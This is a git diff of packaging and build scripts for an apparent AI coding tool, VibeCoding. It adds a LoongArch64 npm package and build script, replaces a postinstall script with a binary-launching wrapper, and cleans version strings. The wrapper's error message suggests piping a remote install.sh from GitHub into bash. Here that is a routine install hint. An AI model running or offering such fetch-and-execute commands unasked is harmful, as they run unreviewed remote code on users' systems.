new file mode 100644
index 0000000..7db884d
--- /dev/null
+++ b/npm/packages/vibecoding-installer-linux-loong64/package.json
@@ -0,0 +1,15 @@
+{
+  "name": "vibecoding-installer-linux-loong64",
+  "version": "0.1.32",
+  "description": "VibeCoding native binary for linux-loong64",
+  "os": ["linux"],
+  "cpu": ["loong64"],
+  "libc": ["glibc"],
+  "files": ["bin/"],
+  "license": "MIT",
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/startvibecoding/vibecoding.git",
+    "directory": "npm"
+  }
+}
diff --git a/npm/packages/vibecoding-installer-linux-musl-x64/package.json b/npm/packages/vibecoding-installer-linux-musl-x64/package.json
index 5be3a18..621455a 100644
--- a/npm/packages/vibecoding-installer-linux-musl-x64/package.json
+++ b/npm/packages/vibecoding-installer-linux-musl-x64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-linux-musl-x64",
-  "version": "v0.1.12-1-gf35b555-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for linux-x64 (musl static)",
   "os": ["linux"],
   "cpu": ["x64"],
diff --git a/npm/packages/vibecoding-installer-linux-x64/package.json b/npm/packages/vibecoding-installer-linux-x64/package.json
index 6c9950a..acff1d6 100644
--- a/npm/packages/vibecoding-installer-linux-x64/package.json
+++ b/npm/packages/vibecoding-installer-linux-x64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-linux-x64",
-  "version": "v0.1.12-1-gf35b555-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for linux-x64",
   "os": ["linux"],
   "cpu": ["x64"],
diff --git a/npm/packages/vibecoding-installer-win32-arm64/package.json b/npm/packages/vibecoding-installer-win32-arm64/package.json
index 3a1e913..64fcba9 100644
--- a/npm/packages/vibecoding-installer-win32-arm64/package.json
+++ b/npm/packages/vibecoding-installer-win32-arm64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-win32-arm64",
-  "version": "v0.1.12-1-gf35b555-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for win32-arm64",
   "os": ["win32"],
   "cpu": ["arm64"],
diff --git a/npm/packages/vibecoding-installer-win32-x64/package.json b/npm/packages/vibecoding-installer-win32-x64/package.json
index 17c86c5..bcf96fe 100644
--- a/npm/packages/vibecoding-installer-win32-x64/package.json
+++ b/npm/packages/vibecoding-installer-win32-x64/package.json
@@ -1,6 +1,6 @@
 {
   "name": "vibecoding-installer-win32-x64",
-  "version": "v0.1.12-1-gf35b555-dirty",
+  "version": "0.1.32",
   "description": "VibeCoding native binary for win32-x64",
   "os": ["win32"],
   "cpu": ["x64"],
diff --git a/npm/postinstall.js b/npm/postinstall.js
deleted file mode 100644
index d2c5e67..0000000
--- a/npm/postinstall.js
+++ /dev/null
@@ -1,91 +0,0 @@
-#!/usr/bin/env node
-
-// Since npm installs the correct platform package via optionalDependencies,
-// this script just finds the installed platform binary and links it to bin/.
-
-const { platform, arch } = require('os');
-const fs = require('fs');
-const path = require('path');
-const { execSync } = require('child_process');
-
-function isMusl() {
-  try {
-    const output = execSync('ldd --version 2>&1', { encoding: 'utf8', timeout: 3000 });
-    return output.includes('musl');
-  } catch {
-    // ldd not found or error, check for musl library
-    try {
-      fs.readdirSync('/lib').some(f => f.startsWith('ld-musl'));
-      return true;
-    } catch {
-      return false;
-    }
-  }
-}
-
-function getPlatformKey() {
-  const p = platform();
-  const a = arch();
-  if (p === 'linux' && isMusl()) {
-    return `linux-musl-${a}`;
-  }
-  return `${p}-${a}`;
-}
-
-const PLATFORM_PACKAGES = {
-  'linux-x64':        'vibecoding-installer-linux-x64',
-  'linux-arm64':      'vibecoding-installer-linux-arm64',
-  'linux-musl-x64':   'vibecoding-installer-linux-musl-x64',
-  'darwin-x64':       'vibecoding-installer-darwin-x64',
-  'darwin-arm64':     'vibecoding-installer-darwin-arm64',
-  'win32-x64':        'vibecoding-installer-win32-x64',
-  'win32-arm64':      'vibecoding-installer-win32-arm64',
-};
-
-function main() {
-  const key = getPlatformKey();
-  const pkgName = PLATFORM_PACKAGES[key];
-
-  if (!pkgName) {
-    console.error(`Error: Unsupported platform: ${key}`);
-    console.error(`Supported: ${Object.keys(PLATFORM_PACKAGES).join(', ')}`);
-    process.exit(1);
-  }
-
-  // Find the platform package in node_modules
-  let platformPkgDir;
-  try {
-    platformPkgDir = path.dirname(require.resolve(pkgName + '/package.json'));
-  } catch {
-    console.error(`Error: Platform package '${pkgName}' not installed.`);
-    console.error('Your platform may not be supported, or the optional dependency was skipped.');
-    process.exit(1);
-  }
-
-  const isWindows = platform() === 'win32';
-  const srcName = isWindows ? 'vibecoding.exe' : 'vibecoding';
-  const destName = isWindows ? 'vibecoding.exe' : 'vibecoding';
-
-  const srcPath = path.join(platformPkgDir, 'bin', srcName);
-  const destPath = path.join(__dirname, 'bin', destName);
-
-  if (!fs.existsSync(srcPath)) {
-    console.error(`Error: Binary not found at ${srcPath}`);
-    process.exit(1);
-  }
-
-  // Ensure bin directory exists
-  const binDir = path.join(__dirname, 'bin');
-  fs.mkdirSync(binDir, { recursive: true });
-
-  // Copy binary
-  fs.copyFileSync(srcPath, destPath);
-
-  if (!isWindows) {
-    fs.chmodSync(destPath, '755');
-  }
-
-  console.log(`VibeCoding installed successfully (${key})`);
-}
-
-main();
diff --git a/scripts/build-deb.sh b/scripts/build-deb.sh
index 1430c1c..23d0867 100755
--- a/scripts/build-deb.sh
+++ b/scripts/build-deb.sh
@@ -7,16 +7,17 @@ set -e
 
 BINARY_NAME="vibecoding"
 PACKAGE_NAME="vibecoding"
-MAINTAINER="VibeCoding Team <team@vibecoding.dev>"
+MAINTAINER="VibeCoding Team <admin@pkold.com>"
 DESCRIPTION="AI-powered terminal coding assistant"
 HOMEPAGE="https://github.com/startvibecoding/vibecoding"
 
 # Parse arguments
 ARCH="${1:-amd64}"
-VERSION="${2:-$(git describe --tags --always --dirty 2>/dev/null || echo "0.0.1")}"
+VERSION="${2:-$(git describe --tags --always 2>/dev/null || echo "0.0.1")}"
 
 # Remove leading 'v' if present
 VERSION="${VERSION#v}"
+VERSION="${VERSION%-dirty}"
 
 BUILD_DIR="dist/deb"
 PACKAGE_DIR="${BUILD_DIR}/${PACKAGE_NAME}_${VERSION}_${ARCH}"
diff --git a/scripts/build-loongarch.sh b/scripts/build-loongarch.sh
new file mode 100755
index 0000000..a7c7bc9
--- /dev/null
+++ b/scripts/build-loongarch.sh
@@ -0,0 +1,26 @@
+#!/bin/bash
+set -e
+
+# Build and package the Linux LoongArch64 (GOARCH=loong64) release.
+# Usage: ./scripts/build-loongarch.sh [version]
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+PROJECT_ROOT="$(dirname "${SCRIPT_DIR}")"
+
+VERSION="${1:-$(git describe --tags --always 2>/dev/null || echo "0.0.1")}"
+
+cd "${PROJECT_ROOT}"
+
+echo "Building Linux LoongArch64 binary..."
+make build-linux-loong64 VERSION="${VERSION}"
+
+echo ""
+echo "Packaging Linux LoongArch64 tarball..."
+"${SCRIPT_DIR}/build-tarball.sh" linux loong64 "${VERSION}"
+
+echo ""
+echo "Packaging Linux LoongArch64 Debian package..."
+"${SCRIPT_DIR}/build-deb.sh" loong64 "${VERSION}"
+
+echo ""
+echo "LoongArch64 packages created under dist/"
diff --git a/scripts/build-npm-packages.sh b/scripts/build-npm-packages.sh
index b6b4845..73c7847 100755
--- a/scripts/build-npm-packages.sh
+++ b/scripts/build-npm-packages.sh
@@ -12,10 +12,20 @@ NPM_DIR="$PROJECT_ROOT/npm"
 BUILD_DIR="$PROJECT_ROOT/bin"
 PACKAGES_DIR="$NPM_DIR/packages"
 
+ensure_wrapper() {
+  mkdir -p "$NPM_DIR/bin"
+  if ! cmp -s "$SCRIPT_DIR/npm-installer-wrapper.js" "$NPM_DIR/bin/vibecoding"; then
+    cp "$SCRIPT_DIR/npm-installer-wrapper.js" "$NPM_DIR/bin/vibecoding"
+  fi
+  chmod +x "$NPM_DIR/bin/vibecoding"
+}
+
 # Clean packages directory
 rm -rf "$PACKAGES_DIR"
 
 # Check if binaries exist
+ensure_wrapper
+
 if [ ! -d "$BUILD_DIR" ]; then
   echo "Error: Build directory not found. Run 'make build-all' first."
   exit 1
@@ -28,6 +38,7 @@ VERSION=$(node -e "console.log(require('$NPM_DIR/package.json').version)")
 declare -A PLATFORMS=(
   ["linux-x64"]="vibecoding-linux-amd64"
   ["linux-arm64"]="vibecoding-linux-arm64"
+  ["linux-loong64"]="vibecoding-linux-loong64"
   ["linux-musl-x64"]="vibecoding-linux-musl-amd64"
   ["darwin-x64"]="vibecoding-darwin-amd64"
   ["darwin-arm64"]="vibecoding-darwin-arm64"
@@ -38,6 +49,7 @@ declare -A PLATFORMS=(
 declare -A OS_MAP=(
   ["linux-x64"]="linux"
   ["linux-arm64"]="linux"
+  ["linux-loong64"]="linux"
   ["linux-musl-x64"]="linux"
   ["darwin-x64"]="darwin"
   ["darwin-arm64"]="darwin"
@@ -48,6 +60,7 @@ declare -A OS_MAP=(
 declare -A CPU_MAP=(
   ["linux-x64"]="x64"
   ["linux-arm64"]="arm64"
+  ["linux-loong64"]="loong64"
   ["linux-musl-x64"]="x64"
   ["darwin-x64"]="x64"
   ["darwin-arm64"]="arm64"
diff --git a/scripts/build-npm.sh b/scripts/build-npm.sh
index e0cc527..498c8d2 100755
--- a/scripts/build-npm.sh
+++ b/scripts/build-npm.sh
@@ -10,11 +10,21 @@ NPM_DIR="$PROJECT_ROOT/npm"
 BIN_DIR="$NPM_DIR/bin"
 BUILD_DIR="$PROJECT_ROOT/bin"
 
+ensure_wrapper() {
+  mkdir -p "$NPM_DIR/bin"
+  if ! cmp -s "$SCRIPT_DIR/npm-installer-wrapper.js" "$NPM_DIR/bin/vibecoding"; then
+    cp "$SCRIPT_DIR/npm-installer-wrapper.js" "$NPM_DIR/bin/vibecoding"
+  fi
+  chmod +x "$NPM_DIR/bin/vibecoding"
+}
+
 # Clean and create bin directory
 rm -rf "$BIN_DIR"
 mkdir -p "$BIN_DIR"
 
 # Check if binaries exist
+ensure_wrapper
+
 if [ ! -d "$BUILD_DIR" ]; then
   echo "Error: Build directory not found. Run 'make build-all' first."
   exit 1
diff --git a/scripts/build-tarball.sh b/scripts/build-tarball.sh
index 9f8f79c..ae60efc 100755
--- a/scripts/build-tarball.sh
+++ b/scripts/build-tarball.sh
@@ -11,10 +11,11 @@ PACKAGE_NAME="vibecoding"
 # Parse arguments
 OS="${1:-linux}"
 ARCH="${2:-amd64}"
-VERSION="${3:-$(git describe --tags --always --dirty 2>/dev/null || echo "0.0.1")}"
+VERSION="${3:-$(git describe --tags --always 2>/dev/null || echo "0.0.1")}"
 
 # Remove leading 'v' if present
 VERSION="${VERSION#v}"
+VERSION="${VERSION%-dirty}"
 
 BUILD_DIR="dist/tarball"
 TARBALL_NAME="${PACKAGE_NAME}-${VERSION}-${OS}-${ARCH}"
diff --git a/scripts/build-zip.sh b/scripts/build-zip.sh
index 06d7163..d2ccf43 100755
--- a/scripts/build-zip.sh
+++ b/scripts/build-zip.sh
@@ -10,10 +10,11 @@ PACKAGE_NAME="vibecoding"
 
 # Parse arguments
 ARCH="${1:-amd64}"
-VERSION="${2:-$(git describe --tags --always --dirty 2>/dev/null || echo "0.0.1")}"
+VERSION="${2:-$(git describe --tags --always 2>/dev/null || echo "0.0.1")}"
 
 # Remove leading 'v' if present
 VERSION="${VERSION#v}"
+VERSION="${VERSION%-dirty}"
 
 BUILD_DIR="dist/zip"
 ZIP_NAME="${PACKAGE_NAME}-${VERSION}-windows-${ARCH}"
diff --git a/scripts/npm-installer-wrapper.js b/scripts/npm-installer-wrapper.js
new file mode 100755
index 0000000..7eed5e2
--- /dev/null
+++ b/scripts/npm-installer-wrapper.js
@@ -0,0 +1,126 @@
+#!/usr/bin/env node
+
+// Wrapper script that resolves and executes the platform-specific binary.
+// When installed via `npm i -g vibecoding-installer`, this script finds the
+// correct binary from the platform-specific optional dependency package.
+
+const { execFileSync } = require('child_process');
+const path = require('path');
+const fs = require('fs');
+
+// Map npm os/cpu to package name
+const PLATFORM_MAP = {
+  'linux-x64-glibc': 'vibecoding-installer-linux-x64',
+  'linux-arm64-glibc': 'vibecoding-installer-linux-arm64',
+  'linux-loong64-glibc': 'vibecoding-installer-linux-loong64',
+  'linux-x64-musl': 'vibecoding-installer-linux-musl-x64',
+  'darwin-x64': 'vibecoding-installer-darwin-x64',
+  'darwin-arm64': 'vibecoding-installer-darwin-arm64',
+  'win32-x64': 'vibecoding-installer-win32-x64',
+  'win32-arm64': 'vibecoding-installer-win32-arm64',
+};
+
+function detectPlatform() {
+  const os = process.platform;   // 'linux', 'darwin', 'win32'
+  const arch = process.arch;     // 'x64', 'arm64'
+
+  if (os === 'linux') {
+    // Detect libc: musl or glibc
+    const isMusl = (() => {
+      try {
+        // Check for Alpine's musl
+        if (fs.existsSync('/etc/alpine-release')) return true;
+        // Check ldd output for musl
+        const { execSync } = require('child_process');
+        const output = execSync('ldd --version 2>&1 || true', { encoding: 'utf8' });
+        return output.includes('musl');
+      } catch {
+        return false;
+      }
+    })();
+
+    return `${os}-${arch}-${isMusl ? 'musl' : 'glibc'}`;
+  }
+
+  return `${os}-${arch}`;
+}
+
+function findBinary() {
+  const platform = detectPlatform();
+  const packageName = PLATFORM_MAP[platform];
+
+  if (!packageName) {
+    console.error(`Unsupported platform: ${platform}`);
+    console.error(`Supported platforms: ${Object.keys(PLATFORM_MAP).join(', ')}`);
+    process.exit(1);
+  }
+
+  const searchDirs = [];
+  const addSearchDir = (dir) => {
+    if (dir && !searchDirs.includes(dir)) {
+      searchDirs.push(dir);
+    }
+  };
+
+  try {
+    addSearchDir(path.dirname(require.resolve(`${packageName}/package.json`)));
+  } catch {
+    // Keep explicit fallbacks below for unusual npm layouts.
+  }
+
+  // npm usually installs dependencies under this package. Some global installs
+  // or package managers may hoist them as siblings, so check both layouts.
+  addSearchDir(path.join(__dirname, '..', 'node_modules', packageName));
+  addSearchDir(path.join(__dirname, '..', '..', packageName));
+
+  for (const pkgDir of searchDirs) {
+    const binName = process.platform === 'win32' ? 'vibecoding.exe' : 'vibecoding';
+    const binPath = path.join(pkgDir, 'bin', binName);
+
+    if (fs.existsSync(binPath)) {
+      return binPath;
+    }
+  }
+
+  // Fallback: check if there's a binary directly in the main package's bin/
+  // (old single-package layout, or development mode)
+  const fallbackBinName = (() => {
+    const suffix = process.platform === 'win32' ? '.exe' : '';
+    const osMap = { linux: 'linux', darwin: 'darwin', win32: 'windows' };
+    const archMap = { x64: 'amd64', arm64: 'arm64', loong64: 'loong64' };
+    return `vibecoding-${osMap[process.platform]}-${archMap[process.arch]}${suffix}`;
+  })();
+
+  const fallbackPath = path.join(__dirname, fallbackBinName);
+  if (fs.existsSync(fallbackPath)) {
+    return fallbackPath;
+  }
+
+  console.error(`Could not find VibeCoding binary for platform: ${detectPlatform()}`);
+  console.error(`Searched for package: ${packageName}`);
+  console.error(`Searched in: ${searchDirs.join(', ')}`);
+  console.error('');
+  console.error('If you installed globally, try reinstalling:');
+  console.error('  npm install -g vibecoding-installer');
+  console.error('');
+  console.error('If the problem persists, install via one-line script instead:');
+  console.error('  curl -fsSL https://raw.githubusercontent.com/startvibecoding/vibecoding/main/install.sh | bash');
+  process.exit(1);
+}
+
+// Main
+const binaryPath = findBinary();
+const args = process.argv.slice(2);
+
+try {
+  execFileSync(binaryPath, args, { stdio: 'inherit' });
+} catch (err) {
+  // Forward the exit code
+  if (err.status !== undefined) {
+    process.exit(err.status);
+  }
+  if (err.code) {
+    process.exit(1);
+  }
+  process.exit(1);
+}
diff --git a/scripts/sync-npm-version.sh b/scripts/sync-npm-version.sh
index 1ae7122..ed31ad1 100755
--- a/scripts/sync-npm-version.sh
+++ b/scripts/sync-npm-version.sh
@@ -13,12 +13,14 @@ PACKAGE_JSON="$NPM_DIR/package.json"
 if [ -n "$1" ]; then
   VERSION="$1"
 else
-  VERSION=$(git describe --tags --always --dirty 2>/dev/null | sed 's/^v//')
+  VERSION=$(git describe --tags --always 2>/dev/null)
   if [ -z "$VERSION" ]; then
     echo "Error: Could not determine version"
     exit 1
   fi
 fi
+VERSION="${VERSION#v}"
+VERSION="${VERSION%-dirty}"
 
 echo "Syncing npm version to: $VERSION"